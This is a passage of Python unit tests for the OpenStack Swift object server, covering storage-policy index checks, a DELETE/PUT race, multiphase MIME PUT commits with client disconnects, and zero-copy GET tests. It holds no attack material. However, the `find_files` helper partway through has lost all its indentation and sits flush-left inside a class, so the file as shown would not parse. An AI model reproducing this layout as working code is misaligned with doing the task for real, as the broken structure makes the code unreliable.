        self.assertFalse(os.path.isdir(object_dir))
        with mock.patch.object(POLICIES, 'get_by_index',
                               lambda _: True):
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            self.assertTrue(os.path.isdir(object_dir))
    def test_storage_policy_index_is_validated(self):
        """Every verb succeeds for valid policy indexes and 503s for an
        index that has no configured policy."""
        # sanity check that index for existing policy is ok
        methods = ('PUT', 'POST', 'GET', 'HEAD', 'REPLICATE', 'DELETE')
        valid_indices = sorted([int(policy) for policy in POLICIES])
        for index in valid_indices:
            object_dir = self.testdir + "/sda1/objects"
            if index > 0:
                # non-default policies get a suffixed data dir
                object_dir = "%s-%s" % (object_dir, index)
            self.assertFalse(os.path.isdir(object_dir))
            for method in methods:
                headers = {
                    'X-Timestamp': next(self.ts).internal,
                    'Content-Type': 'application/x-test',
                    'X-Backend-Storage-Policy-Index': index}
                if POLICIES[index].policy_type == EC_POLICY:
                    # EC policies require a fragment index on PUT
                    headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
                req = Request.blank(
                    '/sda1/p/a/c/o',
                    environ={'REQUEST_METHOD': method},
                    headers=headers)
                req.body = 'VERIFY'
                resp = req.get_response(self.object_controller)
                self.assertTrue(is_success(resp.status_int),
                                '%s method failed: %r' % (method, resp.status))
        # index for non-existent policy should return 503
        index = valid_indices[-1] + 1
        for method in methods:
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': method},
                                headers={
                                    'X-Timestamp': next(self.ts).internal,
                                    'Content-Type': 'application/x-test',
                                    'X-Backend-Storage-Policy-Index': index})
            req.body = 'VERIFY'
            object_dir = self.testdir + "/sda1/objects-%s" % index
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 503)
            # and no data dir is created for the bogus policy
            self.assertFalse(os.path.isdir(object_dir))
    def test_race_doesnt_quarantine(self):
        """A PUT racing between a DELETE's listdir and read_metadata must
        not cause the object to be quarantined."""
        existing_timestamp = normalize_timestamp(time())
        delete_timestamp = normalize_timestamp(time() + 1)
        put_timestamp = normalize_timestamp(time() + 2)
        # make a .ts
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': existing_timestamp})
        req.get_response(self.object_controller)
        # force a PUT between the listdir and read_metadata of a DELETE
        put_once = [False]
        orig_listdir = os.listdir
        def mock_listdir(path):
            listing = orig_listdir(path)
            if not put_once[0]:
                # only inject the racing PUT on the first listdir call
                put_once[0] = True
                req = Request.blank(
                    '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                    headers={'X-Timestamp': put_timestamp,
                             'Content-Length': '9',
                             'Content-Type': 'application/octet-stream'})
                req.body = 'some data'
                resp = req.get_response(self.object_controller)
                self.assertEqual(resp.status_int, 201)
            return listing
        with mock.patch('os.listdir', mock_listdir):
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_timestamp})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        # nothing was quarantined by the race
        qdir = os.path.join(self.testdir, 'sda1', 'quarantined')
        self.assertFalse(os.path.exists(qdir))
        # and the newer PUT's data survives the older DELETE
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'], put_timestamp)
    def test_multiphase_put_draining(self):
        """The server must drain the whole MIME request body — including
        unknown document parts — and only read while inside a timeout."""
        # We want to ensure that we read the whole response body even if
        # it's multipart MIME and there's document parts that we don't
        # expect or understand. This'll help save our bacon if we ever jam
        # more stuff in there.
        in_a_timeout = [False]
        # inherit from BaseException so we get a stack trace when the test
        # fails instead of just a 500
        class NotInATimeout(BaseException):
            pass
        class FakeTimeout(BaseException):
            # stands in for ChunkReadTimeout; just flips the flag that the
            # picky wsgi.input checks on every read
            def __enter__(self):
                in_a_timeout[0] = True
            def __exit__(self, typ, value, tb):
                in_a_timeout[0] = False
        class PickyWsgiBytesIO(WsgiBytesIO):
            # raises unless the server wrapped the read in a timeout
            def read(self, *a, **kw):
                if not in_a_timeout[0]:
                    raise NotInATimeout()
                return WsgiBytesIO.read(self, *a, **kw)
            def readline(self, *a, **kw):
                if not in_a_timeout[0]:
                    raise NotInATimeout()
                return WsgiBytesIO.readline(self, *a, **kw)
        test_data = 'obj data'
        footer_meta = {
            "X-Object-Sysmeta-Ec-Frag-Index": "7",
            "Etag": md5(test_data).hexdigest(),
        }
        footer_json = json.dumps(footer_meta)
        footer_meta_cksum = md5(footer_json).hexdigest()
        # body + footer + two extra parts the server doesn't understand
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
            "X-Document: object metadata",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_json,
            "--boundary123",
            "X-Document: we got cleverer",
            "",
            "stuff stuff meaningless stuuuuuuuuuuff",
            "--boundary123",
            "X-Document: we got even cleverer; can you believe it?",
            "Waneshaft: ambifacient lunar",
            "Casing: malleable logarithmic",
            "",
            "potato potato potato potato potato potato potato",
            "--boundary123--"
        ))
        if six.PY3:
            test_doc = test_doc.encode('utf-8')
        # phase1 - PUT request with object metadata in footer and
        # multiphase commit conversation
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
        }
        wsgi_input = PickyWsgiBytesIO(test_doc)
        req = Request.blank(
            "/sda1/0/a/c/o",
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': wsgi_input},
            headers=headers)
        app = object_server.ObjectController(self.conf, logger=self.logger)
        with mock.patch('swift.obj.server.ChunkReadTimeout', FakeTimeout):
            resp = req.get_response(app)
        self.assertEqual(resp.status_int, 201)  # sanity check
        in_a_timeout[0] = True  # so we can check without an exception
        self.assertEqual(wsgi_input.read(), '')  # we read all the bytes
@patch_policies(test_policies)
class TestObjectServer(unittest.TestCase):
    """Tests that drive a real object server over a socket (eventlet wsgi),
    mainly exercising the Expect/100-continue and multiphase PUT protocol."""
    def setUp(self):
        # dirs
        self.tmpdir = tempfile.mkdtemp()
        self.tempdir = os.path.join(self.tmpdir, 'tmp_test_obj_server')
        self.devices = os.path.join(self.tempdir, 'srv/node')
        for device in ('sda1', 'sdb1'):
            os.makedirs(os.path.join(self.devices, device))
        self.conf = {
            'devices': self.devices,
            'swift_dir': self.tempdir,
            'mount_check': 'false',
        }
        self.logger = debug_logger('test-object-server')
        self.app = object_server.ObjectController(
            self.conf, logger=self.logger)
        # serve the app on an ephemeral port in a greenthread
        sock = listen_zero()
        self.server = spawn(wsgi.server, sock, self.app, utils.NullLogger())
        self.port = sock.getsockname()[1]
    def tearDown(self):
        rmtree(self.tmpdir)
    def test_not_found(self):
        # GET of a never-written object is a plain 404
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'GET', '/a/c/o')
        resp = conn.getresponse()
        self.assertEqual(resp.status, 404)
        resp.read()
        resp.close()
    def test_expect_on_put(self):
        """Plain PUT with Expect: 100-continue gets 100 then 201."""
        test_body = 'test'
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': utils.Timestamp(time()).internal,
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        conn.send(test_body)
        resp = conn.getresponse()
        self.assertEqual(resp.status, 201)
        resp.read()
        resp.close()
    def test_expect_on_put_footer(self):
        """When the client offers metadata footers, the 100-continue
        response advertises X-Obj-Metadata-Footer: yes."""
        test_body = 'test'
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': utils.Timestamp(time()).internal,
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Obj-Metadata-Footer'], 'yes')
        resp.close()
    def test_expect_on_put_conflict(self):
        """A second PUT with an identical timestamp is rejected at the
        Expect stage with 409 and reports the existing backend timestamp."""
        test_body = 'test'
        put_timestamp = utils.Timestamp(time())
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': put_timestamp.internal,
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        conn.send(test_body)
        resp = conn.getresponse()
        self.assertEqual(resp.status, 201)
        resp.read()
        resp.close()
        # and again with same timestamp
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 409)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Backend-Timestamp'], put_timestamp)
        resp.read()
        resp.close()
    def test_multiphase_put_no_mime_boundary(self):
        """A multiphase-commit PUT without the required MIME boundary
        header is rejected with 400 at the Expect stage."""
        test_data = 'obj data'
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 400)
        resp.read()
        resp.close()
    # NOTE: "diconnect" typo is kept -- the method name is the test's
    # public identifier.
    def test_expect_on_multiphase_put_diconnect(self):
        """Client disconnect right after the first body chunk is logged as
        a 499, not as a server error."""
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': 0,
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Obj-Multiphase-Commit'], 'yes')
        conn.send('c\r\n--boundary123\r\n')
        # disconnect client
        conn.sock.fd._sock.close()
        # yield so the server greenthread can notice the closed socket
        for i in range(2):
            sleep(0)
        self.assertFalse(self.logger.get_lines_for_level('error'))
        for line in self.logger.get_lines_for_level('info'):
            self.assertIn(' 499 ', line)
def find_files(self):
ignore_files = {'.lock', 'hashes.invalid'}
found_files = defaultdict(list)
for root, dirs, files in os.walk(self.devices):
for filename in files:
if filename in ignore_files:
continue
_name, ext = os.path.splitext(filename)
file_path = os.path.join(root, filename)
found_files[ext].append(file_path)
return found_files
    @contextmanager
    def _check_multiphase_put_commit_handling(self,
                                              test_doc=None,
                                              headers=None,
                                              finish_body=True):
        """
        This helper will setup a multiphase chunked PUT request and yield at
        the context at the commit phase (after getting the second expect-100
        continue response.
        It can setup a reasonable stub request, but you can over-ride some
        characteristics of the request via kwargs.
        :param test_doc: first part of the mime conversation before the object
                         server will send the 100-continue, this includes the
                         object body
        :param headers: headers to send along with the initial request; some
                        object-metadata (e.g.  X-Backend-Obj-Content-Length)
                        is generally expected to match the test_doc)
        :param finish_body: boolean, if true send "0\r\n\r\n" after test_doc
                            and wait for 100-continue before yielding context
        """
        # default stub: EC frag body plus a checksummed metadata footer
        test_data = encode_frag_archive_bodies(POLICIES[1], 'obj data')[0]
        footer_meta = {
            "X-Object-Sysmeta-Ec-Frag-Index": "2",
            "Etag": md5(test_data).hexdigest(),
        }
        footer_json = json.dumps(footer_meta)
        footer_meta_cksum = md5(footer_json).hexdigest()
        test_doc = test_doc or "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
            "X-Document: object metadata",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_json,
            "--boundary123",
        ))
        # phase1 - PUT request with object metadata in footer and
        # multiphase commit conversation
        headers = headers or {
            'Content-Type': 'text/plain',
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        # reuse a caller-supplied X-Timestamp, else stamp the request now
        put_timestamp = utils.Timestamp(headers.setdefault(
            'X-Timestamp', utils.Timestamp(time()).internal))
        container_update = \
            'swift.obj.server.ObjectController.container_update'
        with mock.patch(container_update) as _container_update:
            conn = bufferedhttp.http_connect(
                '127.0.0.1', self.port, 'sda1', '0',
                'PUT', '/a/c/o', headers=headers)
            resp = conn.getexpect()
            self.assertEqual(resp.status, 100)
            expect_headers = HeaderKeyDict(resp.getheaders())
            to_send = "%x\r\n%s\r\n" % (len(test_doc), test_doc)
            conn.send(to_send)
            if finish_body:
                conn.send("0\r\n\r\n")
                # verify 100-continue response to mark end of phase1
                resp = conn.getexpect()
                self.assertEqual(resp.status, 100)
            # yield relevant context for test
            yield {
                'conn': conn,
                'expect_headers': expect_headers,
                'put_timestamp': put_timestamp,
                'mock_container_update': _container_update,
            }
        # give the object server a little time to trampoline enough to
        # recognize request has finished, or socket has closed or whatever
        sleep(0.1)
    def test_multiphase_put_client_disconnect_right_before_commit(self):
        """Disconnect before sending any commit doc: non-durable frag data
        is kept, no durable state, no container update, logged as 499."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # just bail stright out
            conn.sock.fd._sock.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data file write
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        # no "#d" marker -- the frag was never made durable
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_client_disconnect_in_the_middle_of_commit(self):
        """Disconnect partway through the commit confirmation doc: same
        outcome as bailing before commit -- frag stays non-durable."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # start commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            # but don't quite the commit body
            to_send = "%x\r\n%s" % \
                (len(commit_confirmation_doc), commit_confirmation_doc[:-1])
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data file write
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_no_metadata_replicated(self):
        """Replicated-policy multiphase PUT (no footers): commit yields a
        plain <ts>.data file and triggers the container update."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, headers=headers) as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            # N.B. no X-Obj-Metadata-Footer header
            self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to make end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        # replicated policy: no frag index / durable marker in the name
        self.assertEqual("%s.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_metadata_footer(self):
        """EC multiphase PUT with footers: commit produces a durable
        <ts>#2#d.data file and the container update fires."""
        with self._check_multiphase_put_commit_handling() as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            self.assertEqual(expect_headers['X-Obj-Metadata-Footer'], 'yes')
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to make end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_metadata_footer_disconnect(self):
        """Disconnect while the footer doc is still incomplete: nothing at
        all is left on disk and no container update happens."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        # eventlet.wsgi won't return < network_chunk_size from a chunked read
        self.app.network_chunk_size = 16
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, finish_body=False) as context:
            conn = context['conn']
            # make footer doc
            footer_meta = {
                "X-Object-Sysmeta-Ec-Frag-Index": "2",
                "Etag": md5(test_data).hexdigest(),
            }
            footer_json = json.dumps(footer_meta)
            footer_meta_cksum = md5(footer_json).hexdigest()
            # send most of the footer doc
            footer_doc = "\r\n".join((
                "X-Document: object metadata",
                "Content-MD5: " + footer_meta_cksum,
                "",
                footer_json,
            ))
            # but don't send final boundary nor last chunk
            to_send = "%x\r\n%s\r\n" % \
                (len(footer_doc), footer_doc)
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # no artifacts left on disk
        found_files = self.find_files()
        self.assertFalse(found_files)
        # ... and no container update
        _container_update = context['mock_container_update']
        self.assertFalse(_container_update.called)
    def test_multiphase_put_ec_fragment_in_headers_no_footers(self):
        """EC multiphase PUT where the frag index arrives in request
        headers instead of a MIME footer still commits durably."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        # phase1 - PUT request with multiphase commit conversation
        # no object metadata in footer
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            # normally the frag index gets sent in the MIME footer (which this
            # test doesn't have, see `test_multiphase_put_metadata_footer`),
            # but the proxy *could* send the frag index in the headers and
            # this test verifies that would work.
            'X-Object-Sysmeta-Ec-Frag-Index': '2',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, headers=headers) as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            # N.B. no X-Obj-Metadata-Footer header
            self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to make end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_bad_commit_message(self):
        """A malformed commit document gets a 500; the frag stays
        non-durable and no container update is sent."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "junkjunk",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            resp = conn.getresponse()
            self.assertEqual(resp.status, 500)
            resp.read()
            resp.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # verify that durable data file was NOT created
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_drains_extra_commit_junk(self):
        """Unknown MIME parts after the commit doc are drained so the
        connection stays usable for a follow-up request."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123",
                "X-Document: we got cleverer",
                "",
                "stuff stuff meaningless stuuuuuuuuuuff",
                "--boundary123",
                "X-Document: we got even cleverer; can you believe it?",
                "Waneshaft: ambifacient lunar",
                "Casing: malleable logarithmic",
                "",
                "potato potato potato potato potato potato potato",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to make end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            # make another request to validate the HTTP protocol state
            conn.putrequest('GET', '/sda1/0/a/c/o')
            conn.putheader('X-Backend-Storage-Policy-Index', '1')
            conn.endheaders()
            resp = conn.getresponse()
            self.assertEqual(resp.status, 200)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_drains_extra_commit_junk_disconnect(self):
        """Disconnect while draining post-commit junk: the commit already
        happened so the durable file stays, but (per current behavior) the
        container update is not made."""
        commit_confirmation_doc = "\r\n".join((
            "X-Document: put commit",
            "",
            "commit_confirmation",
            "--boundary123",
            "X-Document: we got cleverer",
            "",
            "stuff stuff meaningless stuuuuuuuuuuff",
            "--boundary123",
            "X-Document: we got even cleverer; can you believe it?",
            "Waneshaft: ambifacient lunar",
            "Casing: malleable logarithmic",
            "",
            "potato potato potato potato potato potato potato",
        ))
        # eventlet.wsgi won't return < network_chunk_size from a chunked read
        self.app.network_chunk_size = 16
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation and some other stuff
            # but don't send final boundary or last chunk
            to_send = "%x\r\n%s\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # but no container update
        self.assertFalse(context['mock_container_update'].called)
@patch_policies
class TestZeroCopy(unittest.TestCase):
    """Test the object server's zero-copy functionality"""
    def _system_can_zero_copy(self):
        # zero-copy needs both splice(2) support and an AF_ALG md5 socket
        if not splice.available:
            return False
        try:
            utils.get_md5_socket()
        except IOError:
            return False
        return True
    def setUp(self):
        if not self._system_can_zero_copy():
            raise SkipTest("zero-copy support is missing")
        self.testdir = mkdtemp(suffix="obj_server_zero_copy")
        mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
        conf = {'devices': self.testdir,
                'mount_check': 'false',
                'splice': 'yes',
                'disk_chunk_size': '4096'}
        self.object_controller = object_server.ObjectController(
            conf, logger=debug_logger())
        self.df_mgr = diskfile.DiskFileManager(
            conf, self.object_controller.logger)
        # serve the controller on an ephemeral port for real HTTP requests
        listener = listen_zero()
        port = listener.getsockname()[1]
        self.wsgi_greenlet = spawn(
            wsgi.server, listener, self.object_controller, NullLogger())
        self.http_conn = httplib.HTTPConnection('127.0.0.1', port)
        self.http_conn.connect()
    def tearDown(self):
        """Tear down for testing swift.object.server.ObjectController"""
        self.wsgi_greenlet.kill()
        rmtree(self.testdir)
    def test_GET(self):
        """Round-trip a small object through the splice path."""
        url_path = '/sda1/2100/a/c/o'
        self.http_conn.request('PUT', url_path, 'obj contents',
                               {'X-Timestamp': '127082564.24709',
                                'Content-Type': 'application/test'})
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 201)
        response.read()
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 200)
        contents = response.read()
        self.assertEqual(contents, 'obj contents')
    def test_GET_big(self):
        # Test with a large-ish object to make sure we handle full socket
        # buffers correctly.
        obj_contents = 'A' * 4 * 1024 * 1024  # 4 MiB
        url_path = '/sda1/2100/a/c/o'
        self.http_conn.request('PUT', url_path, obj_contents,
                               {'X-Timestamp': '1402600322.52126',
                                'Content-Type': 'application/test'})
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 201)
        response.read()
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 200)
        contents = response.read()
        self.assertEqual(contents, obj_contents)
    def test_quarantine(self):
        """Corrupting the on-disk file makes the first GET serve the bad
        bytes but quarantine the object, so the next GET is a 404."""
        obj_hash = hash_path('a', 'c', 'o')
        url_path = '/sda1/2100/a/c/o'
        ts = '1402601849.47475'
        self.http_conn.request('PUT', url_path, 'obj contents',
                               {'X-Timestamp': ts,
                                'Content-Type': 'application/test'})
